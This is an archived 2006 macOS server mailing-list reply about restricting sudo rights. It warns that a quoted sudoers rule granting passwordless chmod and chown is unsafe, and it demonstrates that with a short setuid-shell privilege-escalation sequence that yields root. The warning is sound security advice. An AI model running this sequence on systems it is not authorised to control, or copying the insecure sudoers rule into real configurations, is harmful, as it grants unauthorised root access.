[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Problems 'su'ing into the root user

Subject: Re: Problems 'su'ing into the root user
From: Ian Ward Comfort <email@hidden>
Date: Tue, 22 Aug 2006 14:45:28 -0700
Delivered-to: email@hidden
Delivered-to: email@hidden

On Aug 22, 2006, at 2:32 PM, Michael Johnson wrote:

You can also restrict the commands the person can run by doing something like:

Cmnd_Alias SUPPORT = /usr/bin/less, /bin/more, /bin/chmod, /bin/ chown, /bin/cat
and then:
username         ALL=(root)      NOPASSWD: SUPPORT
This gives the person rights to run the listed commands as root, but nothing else.

Realize that this particular combination gives a malicious user a root shell if (s)he wants one.

foosball:~ ian$ cp /bin/sh .
foosball:~ ian$ sudo chown root:wheel ./sh
foosball:~ ian$ sudo chmod 4555 ./sh
foosball:~ ian$ ./sh -c whoami
root

—IWC

_______________________________________________
Do not post admin requests to the list. They will be ignored.
Macos-x-server mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:
http://lists.apple.com/mailman/options/macos-x-server/email@hidden

This email sent to email@hidden

Follow-Ups:
- Re: Problems 'su'ing into the root user
  - From: Michael Johnson <email@hidden>

References:
	>Re: Problems 'su'ing into the root user (From: David Rocamora <email@hidden>)
	>Re: Problems 'su'ing into the root user (From: Michael Johnson <email@hidden>)

Prev by Date: Dock preferences for new logins
Next by Date: Re: Virus software [filtering viruses]
Previous by thread: Re: Problems 'su'ing into the root user
Next by thread: Re: Problems 'su'ing into the root user
Index(es):
- Date
- Thread

Home